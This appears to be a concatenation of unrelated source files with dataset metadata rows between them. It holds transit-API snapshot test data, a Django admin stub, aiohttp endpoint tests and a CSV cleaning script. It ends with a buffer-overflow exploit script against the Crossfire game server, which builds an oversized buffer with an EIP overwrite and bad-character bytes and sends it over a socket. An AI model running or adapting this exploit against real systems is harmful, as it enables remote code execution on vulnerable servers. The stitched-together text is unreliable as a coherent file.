"name": "name of test rider category",
"price": "2.00",
},
{
"currency_type": "EUR",
"description": "description of test rider category",
"id": "00000000-0000-0000-0000-000000000003",
"name": "name of test rider category",
"price": "3.00",
},
],
"description": "Description",
"id": "00000000-0000-0000-0000-000000000000",
"instructions": "Instructions",
"name": "Name",
}
]
snapshots["test_routes 1"] = [
{
"agency": {
"email": "test-agency@example.com",
"logo_url": "www.testagency.com/logo",
"name": "test agency",
"phone": "777777",
"url": "www.testagency.com",
},
"capacity_sales": 0,
"description": "desc of test route ",
"id": "00000000-0000-0000-0000-000000000000",
"name": "",
"stops": [
{
"description": "desc of test stop ",
"id": "00000000-0000-0000-0000-000000000001",
"name": "stop ",
"tts_name": "tts_name of stop ",
"wheelchair_boarding": 0,
},
{
"description": "desc of test stop ",
"id": "00000000-0000-0000-0000-000000000002",
"name": "stop ",
"tts_name": "tts_name of stop ",
"wheelchair_boarding": 0,
},
],
"ticket_types": [],
"url": "url of test route ",
}
]
snapshots["test_routes_departures[filters2] 1"] = [
{
"arrival_time": "2021-02-18T13:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 1",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-18T13:00:00Z",
"direction_id": 0,
"id": "00000000-0000-0000-0000-000000000003",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 1,
"stops_after_this": 1,
"timepoint": 1,
"wheelchair_accessible": 0,
},
{
"arrival_time": "2021-02-19T01:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 2",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T01:00:00Z",
"direction_id": 1,
"id": "00000000-0000-0000-0000-000000000004",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 2,
"stops_after_this": 0,
"timepoint": 1,
"wheelchair_accessible": 0,
},
]
snapshots["test_routes_departures[filters2] 2"] = [
{
"arrival_time": "2021-02-18T14:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 1",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-18T14:00:00Z",
"direction_id": 0,
"id": "00000000-0000-0000-0000-000000000003",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 2,
"stops_after_this": 0,
"timepoint": 1,
"wheelchair_accessible": 0,
},
{
"arrival_time": "2021-02-19T00:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 2",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T00:00:00Z",
"direction_id": 1,
"id": "00000000-0000-0000-0000-000000000004",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 1,
"stops_after_this": 1,
"timepoint": 1,
"wheelchair_accessible": 0,
},
]
snapshots["test_routes_departures[filters3] 1"] = [
{
"arrival_time": "2021-02-19T13:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 1",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T13:00:00Z",
"direction_id": 0,
"id": "00000000-0000-0000-0000-000000000005",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 1,
"stops_after_this": 1,
"timepoint": 1,
"wheelchair_accessible": 0,
}
]
snapshots["test_routes_departures[filters3] 2"] = [
{
"arrival_time": "2021-02-19T14:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 1",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T14:00:00Z",
"direction_id": 0,
"id": "00000000-0000-0000-0000-000000000005",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 2,
"stops_after_this": 0,
"timepoint": 1,
"wheelchair_accessible": 0,
}
]
snapshots["test_routes_departures[filters4] 1"] = [
{
"arrival_time": "2021-02-18T13:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 1",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-18T13:00:00Z",
"direction_id": 0,
"id": "00000000-0000-0000-0000-000000000003",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 1,
"stops_after_this": 1,
"timepoint": 1,
"wheelchair_accessible": 0,
}
]
snapshots["test_routes_departures[filters4] 2"] = [
{
"arrival_time": "2021-02-18T14:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 1",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-18T14:00:00Z",
"direction_id": 0,
"id": "00000000-0000-0000-0000-000000000003",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 2,
"stops_after_this": 0,
"timepoint": 1,
"wheelchair_accessible": 0,
}
]
snapshots["test_routes_departures[filters5] 1"] = [
{
"arrival_time": "2021-02-19T01:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 2",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T01:00:00Z",
"direction_id": 1,
"id": "00000000-0000-0000-0000-000000000004",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 2,
"stops_after_this": 0,
"timepoint": 1,
"wheelchair_accessible": 0,
}
]
snapshots["test_routes_departures[filters5] 2"] = [
{
"arrival_time": "2021-02-19T00:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 2",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T00:00:00Z",
"direction_id": 1,
"id": "00000000-0000-0000-0000-000000000004",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 1,
"stops_after_this": 1,
"timepoint": 1,
"wheelchair_accessible": 0,
}
]
snapshots["test_routes_departures[filters6] 1"] = []
snapshots["test_routes_departures[filters6] 2"] = []
snapshots["test_routes_departures[filters7] 1"] = [
{
"arrival_time": "2021-02-18T13:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 1",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-18T13:00:00Z",
"direction_id": 0,
"id": "00000000-0000-0000-0000-000000000003",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 1,
"stops_after_this": 1,
"timepoint": 1,
"wheelchair_accessible": 0,
},
{
"arrival_time": "2021-02-19T01:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 2",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T01:00:00Z",
"direction_id": 1,
"id": "00000000-0000-0000-0000-000000000004",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 2,
"stops_after_this": 0,
"timepoint": 1,
"wheelchair_accessible": 0,
},
]
snapshots["test_routes_departures[filters7] 2"] = [
{
"arrival_time": "2021-02-18T14:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 1",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-18T14:00:00Z",
"direction_id": 0,
"id": "00000000-0000-0000-0000-000000000003",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 2,
"stops_after_this": 0,
"timepoint": 1,
"wheelchair_accessible": 0,
},
{
"arrival_time": "2021-02-19T00:00:00Z",
"bikes_allowed": 0,
"block_id": "block_id of test trip 2",
"departure_headsign": "headsign of test trip ",
"departure_time": "2021-02-19T00:00:00Z",
"direction_id": 1,
"id": "00000000-0000-0000-0000-000000000004",
"short_name": "short_name of test trip ",
"stop_headsign": "stop_headsign of test stop time ",
"stop_sequence": 1,
"stops_after_this": 1,
"timepoint": 1,
"wheelchair_accessible": 0,
},
]
| 33.805031 | 68 | 0.557302 | 1,215 | 10,750 | 4.719342 | 0.080658 | 0.069062 | 0.073247 | 0.065923 | 0.928845 | 0.898326 | 0.877398 | 0.852285 | 0.852285 | 0.852285 | 0 | 0.159688 | 0.295721 | 10,750 | 317 | 69 | 33.911672 | 0.597675 | 0.005767 | 0 | 0.682274 | 0 | 0 | 0.579036 | 0.1416 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.006689 | 0 | 0.006689 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
63406ddaa3303982053eb00f09c38919c00d2f1a | 148 | py | Python | profesores/admin.py | Etxea/gestion_eide_web | 8a59be1ddb59a4713cb3346534fd01f643d8f924 | [
"MIT"
] | null | null | null | profesores/admin.py | Etxea/gestion_eide_web | 8a59be1ddb59a4713cb3346534fd01f643d8f924 | [
"MIT"
] | null | null | null | profesores/admin.py | Etxea/gestion_eide_web | 8a59be1ddb59a4713cb3346534fd01f643d8f924 | [
"MIT"
] | null | null | null | from models import *
from django.contrib import admin
class ProfesorAdmin(admin.ModelAdmin):
pass
admin.site.register(Profesor,ProfesorAdmin)
| 18.5 | 43 | 0.804054 | 18 | 148 | 6.611111 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121622 | 148 | 7 | 44 | 21.142857 | 0.915385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
63590e5b1089d8cd7cfda5467ef2962a2c5442fd | 37 | py | Python | accuasset/domain/__init__.py | sooeun67/accuasset | 0db5b0c189784f48033f7c7b3e7d130b43d9fb79 | [
"MIT"
] | null | null | null | accuasset/domain/__init__.py | sooeun67/accuasset | 0db5b0c189784f48033f7c7b3e7d130b43d9fb79 | [
"MIT"
] | null | null | null | accuasset/domain/__init__.py | sooeun67/accuasset | 0db5b0c189784f48033f7c7b3e7d130b43d9fb79 | [
"MIT"
] | 2 | 2021-03-25T02:06:50.000Z | 2021-03-25T02:52:10.000Z | from .nlp import *
from .eda import * | 18.5 | 18 | 0.702703 | 6 | 37 | 4.333333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189189 | 37 | 2 | 19 | 18.5 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
636abb9d2ffdab32f4fed0022edb6d88aaed73e3 | 14 | py | Python | project_files/a.py | yangpan0152/Alita | 87f3bea03684a3333e3d86d3237834fdbcf9d908 | [
"MIT"
] | null | null | null | project_files/a.py | yangpan0152/Alita | 87f3bea03684a3333e3d86d3237834fdbcf9d908 | [
"MIT"
] | null | null | null | project_files/a.py | yangpan0152/Alita | 87f3bea03684a3333e3d86d3237834fdbcf9d908 | [
"MIT"
] | null | null | null | a = 10
b = 30
| 4.666667 | 6 | 0.428571 | 4 | 14 | 1.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 0.428571 | 14 | 2 | 7 | 7 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
639fe7ff57af936b0c175ca5d23a510fb5eccb7a | 176 | py | Python | modules/dials/model/data/__init__.py | jorgediazjr/dials-dev20191018 | 77d66c719b5746f37af51ad593e2941ed6fbba17 | [
"BSD-3-Clause"
] | null | null | null | modules/dials/model/data/__init__.py | jorgediazjr/dials-dev20191018 | 77d66c719b5746f37af51ad593e2941ed6fbba17 | [
"BSD-3-Clause"
] | null | null | null | modules/dials/model/data/__init__.py | jorgediazjr/dials-dev20191018 | 77d66c719b5746f37af51ad593e2941ed6fbba17 | [
"BSD-3-Clause"
] | 1 | 2020-02-04T15:39:06.000Z | 2020-02-04T15:39:06.000Z | from __future__ import absolute_import, division, print_function
import boost.python
ext = boost.python.import_ext("dials_model_data_ext")
from dials_model_data_ext import *
| 25.142857 | 64 | 0.840909 | 26 | 176 | 5.192308 | 0.5 | 0.162963 | 0.207407 | 0.251852 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096591 | 176 | 6 | 65 | 29.333333 | 0.849057 | 0 | 0 | 0 | 0 | 0 | 0.113636 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 1 | 0 | 1 | 0.25 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8925bd396ab3503bd9f1ecc2291873b51f786545 | 33 | py | Python | basic_ml/__init__.py | dagster-io/dagster-ml-example | c80fbcc49a2be0f32e46b7c4824ff909a92bba83 | [
"Apache-2.0"
] | null | null | null | basic_ml/__init__.py | dagster-io/dagster-ml-example | c80fbcc49a2be0f32e46b7c4824ff909a92bba83 | [
"Apache-2.0"
] | 3 | 2022-02-03T15:27:50.000Z | 2022-02-03T16:49:01.000Z | basic_ml/__init__.py | dagster-io/dagster-ml-example | c80fbcc49a2be0f32e46b7c4824ff909a92bba83 | [
"Apache-2.0"
] | null | null | null | from .repository import basic_ml
| 16.5 | 32 | 0.848485 | 5 | 33 | 5.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.931034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
89372fac77f04b54a86f8fd9650f2574230f8066 | 3,259 | py | Python | tests/test_web_app.py | Pentusha/aiohttp-apispec | a531a164f719f9d0077a6a3cd6730c3d6de6926c | [
"MIT"
] | null | null | null | tests/test_web_app.py | Pentusha/aiohttp-apispec | a531a164f719f9d0077a6a3cd6730c3d6de6926c | [
"MIT"
] | null | null | null | tests/test_web_app.py | Pentusha/aiohttp-apispec | a531a164f719f9d0077a6a3cd6730c3d6de6926c | [
"MIT"
] | null | null | null |
async def test_response_200_get(aiohttp_app):
res = await aiohttp_app.get('/v1/test', params={'id': 1, 'name': 'max'})
assert res.status == 200
async def test_response_422_get(aiohttp_app):
res = await aiohttp_app.get(
'/v1/test', params={'id': 'string', 'name': 'max'}
)
assert res.status == 422
async def test_response_200_post(aiohttp_app):
res = await aiohttp_app.post('/v1/test', json={'id': 1, 'name': 'max'})
assert res.status == 200
async def test_response_200_post_callable_schema(aiohttp_app):
res = await aiohttp_app.post(
'/v1/test_call', json={'id': 1, 'name': 'max'}
)
assert res.status == 200
async def test_response_422_post(aiohttp_app):
res = await aiohttp_app.post(
'/v1/test', json={'id': 'string', 'name': 'max'}
)
assert res.status == 422
async def test_response_not_docked(aiohttp_app):
res = await aiohttp_app.get('/v1/other', params={'id': 1, 'name': 'max'})
assert res.status == 200
async def test_response_data_post(aiohttp_app):
res = await aiohttp_app.post(
'/v1/echo', json={'id': 1, 'name': 'max', 'list_field': [1, 2, 3, 4]}
)
assert (await res.json()) == {
'id': 1,
'name': 'max',
'list_field': [1, 2, 3, 4],
}
async def test_response_data_get_old_data(aiohttp_app):
res = await aiohttp_app.get(
'/v1/echo_old',
params=[
('id', '1'),
('name', 'max'),
('bool_field', '0'),
('list_field', '1'),
('list_field', '2'),
('list_field', '3'),
('list_field', '4'),
],
)
assert (await res.json()) == {
'id': 1,
'name': 'max',
'bool_field': False,
'list_field': [1, 2, 3, 4],
}
async def test_response_data_get(aiohttp_app):
res = await aiohttp_app.get(
'/v1/echo',
params=[
('id', '1'),
('name', 'max'),
('bool_field', '0'),
('list_field', '1'),
('list_field', '2'),
('list_field', '3'),
('list_field', '4'),
],
)
assert (await res.json()) == {
'id': 1,
'name': 'max',
'bool_field': False,
'list_field': [1, 2, 3, 4],
}
async def test_response_data_class_get(aiohttp_app):
res = await aiohttp_app.get(
'/v1/class_echo',
params=[
('id', '1'),
('name', 'max'),
('bool_field', '0'),
('list_field', '1'),
('list_field', '2'),
('list_field', '3'),
('list_field', '4'),
],
)
assert (await res.json()) == {
'id': 1,
'name': 'max',
'bool_field': False,
'list_field': [1, 2, 3, 4],
}
async def test_response_data_class_post(aiohttp_app):
res = await aiohttp_app.post('/v1/class_echo')
assert res.status == 405
async def test_response_data_class_without_spec(aiohttp_app):
res = await aiohttp_app.delete('/v1/class_echo')
assert (await res.json()) == {'hello': 'world'}
async def test_swagger_handler_200(aiohttp_app):
res = await aiohttp_app.get('/v1/api/docs/api-docs')
assert res.status == 200
| 26.072 | 77 | 0.529303 | 415 | 3,259 | 3.913253 | 0.120482 | 0.160099 | 0.096059 | 0.144089 | 0.879926 | 0.8633 | 0.822044 | 0.822044 | 0.781404 | 0.637315 | 0 | 0.043966 | 0.288125 | 3,259 | 124 | 78 | 26.282258 | 0.656034 | 0 | 0 | 0.606061 | 0 | 0 | 0.166053 | 0.006446 | 0 | 0 | 0 | 0 | 0.131313 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
89379c1124eb373ef294e1bc26dc6c55cc821810 | 3,443 | py | Python | Uploads/format.py | sudhamstarun/DataSorcerer | b61532204b1d8a0e354833abe7a661f1bb1b4d27 | [
"MIT"
] | 4 | 2019-09-14T16:32:46.000Z | 2021-10-11T06:01:38.000Z | Uploads/format.py | sudhamstarun/DataSorcerer | b61532204b1d8a0e354833abe7a661f1bb1b4d27 | [
"MIT"
] | 2 | 2019-04-12T13:17:19.000Z | 2019-04-25T11:46:50.000Z | Uploads/format.py | sudhamstarun/DataSorcerer | b61532204b1d8a0e354833abe7a661f1bb1b4d27 | [
"MIT"
] | 7 | 2019-09-04T22:04:11.000Z | 2021-11-11T13:58:30.000Z | import csv
import sys
in_file = sys.argv[1]
out_file = sys.argv[2]
row_reader = csv.reader(open(in_file, "rt", encoding="utf-8"))
row_writer = csv.writer(open(out_file, "wt", encoding="utf-8"))
for row in row_reader:
i = 0
new_row = []
for val in row:
if not val or val == '\xa0' or val == '$' or val == ')%' or val == ')' or val == '\xa0\xa0' or val == '\n\xa0\n' or val == '\xa0\n' or val == '\n\xa0' or val == '\n$' or val == '\n) $' or val == '\n)' or val == '\n)%' or val == ')\xa0' or val == 'USD' or val == '\n 0\n' or val == '\n $\n' or val == '\n )\n' or val == '\n %\n' or val == '\n\xa0\t' or val == '\n\n' or val == '\xa0\n\t' or val == '%' or val == ' ' or val == '\nUSD\n' or val == '1' or val == '2' or val == '3' or val == '4' or val == '5' or val == '6' or val == '7' or val == '8' or val == '\nUSD\n' or val == '\xa0USD' or val == '\n\xa0USD\n' or val == '\n$\n' or val == '\n)\n' or val == '\n%' or val == '\nUSD ' or val == '\n$' or val == '\xa0\xa0\xa0\xa0\xa0\xa0$' or val == '\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0$' or val == '\xa0$' or val == ' \xa0' or val == '\nUSD ' or val == '\n%' or val == '\nJPY ' or val == '\n ' or val == '\xa0 ' or val == '$\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 ' or val == '\xa0 ' or val == '\nRUB ' or val == '\nCHF ' or val == '\nCOP ' or val == '\nMXN ' or val == '\nUSD ' or val == '%\xa0' or val == '\nJPY' or val == '\nGBP' or val == '\nCHF' or val == '\nUSD' or val == '\n%+' or val == '\xa0\n ' or val == '\n%)' or val == '\xa0\xa0\xa0' or val == '\xa0\xa0\xa0\xa0' or val == '$ ' or val == '\xa0\xa0\xa0\n' or val == ')%\xa0' or val == '\n ' or val == 'Currency' or val == '\n' or val == '\xa0\n\n\t' or val == '%)' or val == '(13)' or val == '(11)' or val == '($' or val == '\n\xa0\n \n' or val == '\n%\n' or val == '\n)\xa0\xa0\n' or val == 'USD\xa0' or val == ') $' or val == '\xa0\xa0\xa0\xa0\xa0' or val == '\xa0\xa0\xa0\xa0\xa0\xa0\xa0' or val == '\n\xa0 ' or val == '\n) ' or val == '\n$ ' or val == '\n% ' or val == '\n\n\xa0 ' or val == '\n\nUSD ' or val == ' \n\xa0\n\n' or val == '\n\n \xa0\n' or val == '\n\n\nUSD\n\n' or val == '\n\n\n \xa0\n\n' or val == '\n)%\n' or val == '\xa0\xa0\xa0\xa0\xa0\xa0' or val == '\n\n\t\t\t\t\t\t\xa0\n' or val == ' \n\n\t\t\t\t\t\t\t)\n\n' or val == ' \n$\n\n' or val == '\n\n\t\t\t\t\t\t)\n' or val == '\n\n\t\t\t\t\t\t$\n' or val == ' \n\n' or val == '\xa0\xa0 ' or val == 'USD ' or val == ')\xa0 ' or val == '\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\n' or val == ' \n\n\t\t\t\t\t\t\t\xa0\n\n' or val == ' \n\n\t\t\t\t\t\t\t$\n\n' or val == ' \n%\n\n' or val == ' \n)\n\n' or val == '\n \n' or val == '\xa0\n\n ' or val == '\n \xa0' or val == '\n \xa0' or val == '\n\xa0\n)\n' or val == 'USD \xa0' or val == '(@ ' or val == '\n ' or val == '\nUSD ' or val == '\n \xa0 \xa0' or val == '\n \xa0' or val == '\n\xa0\n ' or val == '\n\xa0 ' or val == '\n\xa0 ' or val == '\n\xa0\n ' or val == '\n\xa0\n\t' or val == '%)\xa0':
# new_row.append(row[i+1])
if(i+1 != (len(row)-1)):
i += 1
else:
new_row.append(val)
if(i+1 != len(row)):
i += 1
#print (row, "->", new_row )
if(len(new_row) > 3):
row_writer.writerow(new_row)
| 137.72 | 2,878 | 0.451351 | 661 | 3,443 | 2.329803 | 0.077156 | 0.412338 | 0.22987 | 0.296104 | 0.756494 | 0.684416 | 0.6 | 0.584416 | 0.517532 | 0.420779 | 0 | 0.0556 | 0.268661 | 3,443 | 24 | 2,879 | 143.458333 | 0.555997 | 0.014813 | 0 | 0.105263 | 0 | 0.263158 | 0.360578 | 0.091767 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
89a38cd5fe48a6f21eb422b866c8ffcbd0d03e2f | 117 | py | Python | src/pyfbad/__init__.py | Teknasyon-Teknoloji/pyfbad | e26c95528f50ae18f9276df95a9037ea7254d376 | [
"MIT"
] | 27 | 2022-01-14T12:04:11.000Z | 2022-03-18T07:41:48.000Z | src/pyfbad/__init__.py | Teknasyon-Teknoloji/pyfbad | e26c95528f50ae18f9276df95a9037ea7254d376 | [
"MIT"
] | null | null | null | src/pyfbad/__init__.py | Teknasyon-Teknoloji/pyfbad | e26c95528f50ae18f9276df95a9037ea7254d376 | [
"MIT"
] | 4 | 2022-01-17T06:04:19.000Z | 2022-03-23T18:16:31.000Z | from . import data
from . import models
from . import features
from . import visualization
from . import notification | 23.4 | 27 | 0.794872 | 15 | 117 | 6.2 | 0.466667 | 0.537634 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162393 | 117 | 5 | 28 | 23.4 | 0.94898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
98a5a626e81d732939df30f5fd6c74352f15528a | 1,677 | py | Python | application/scripts/crossfire/cf-badchar-eip3.py | cys3c/viper-shell | e05a07362b7d1e6d73c302a24d2506846e43502c | [
"PSF-2.0",
"BSD-2-Clause"
] | 2 | 2018-06-30T03:21:30.000Z | 2020-03-22T02:31:02.000Z | application/scripts/crossfire/cf-badchar-eip3.py | cys3c/viper-shell | e05a07362b7d1e6d73c302a24d2506846e43502c | [
"PSF-2.0",
"BSD-2-Clause"
] | null | null | null | application/scripts/crossfire/cf-badchar-eip3.py | cys3c/viper-shell | e05a07362b7d1e6d73c302a24d2506846e43502c | [
"PSF-2.0",
"BSD-2-Clause"
] | 3 | 2017-11-15T11:08:20.000Z | 2020-03-22T02:31:03.000Z | #!/usr/bin/python
import socket
#nasm > add eax,12
#00000000 83C00C add eax,byte +0xc
#nasm > jmp eax
#00000000 FFE0 jmp eax
#Fortunately for us, these two sets of instructions take up only 5 bytes of memory
#convert 83C00C and FFE0 to hex below
#\x83\xc0\x0c\xff\xe0
host = "127.0.0.1"
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
crash="\x41" * 4368 + "B" * 4 + badchars + "C" * 7
buffer = "\x11(setup sound " + crash
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host, 13327))
data=s.recv(1024)
print data
s.send(buffer)
s.close()
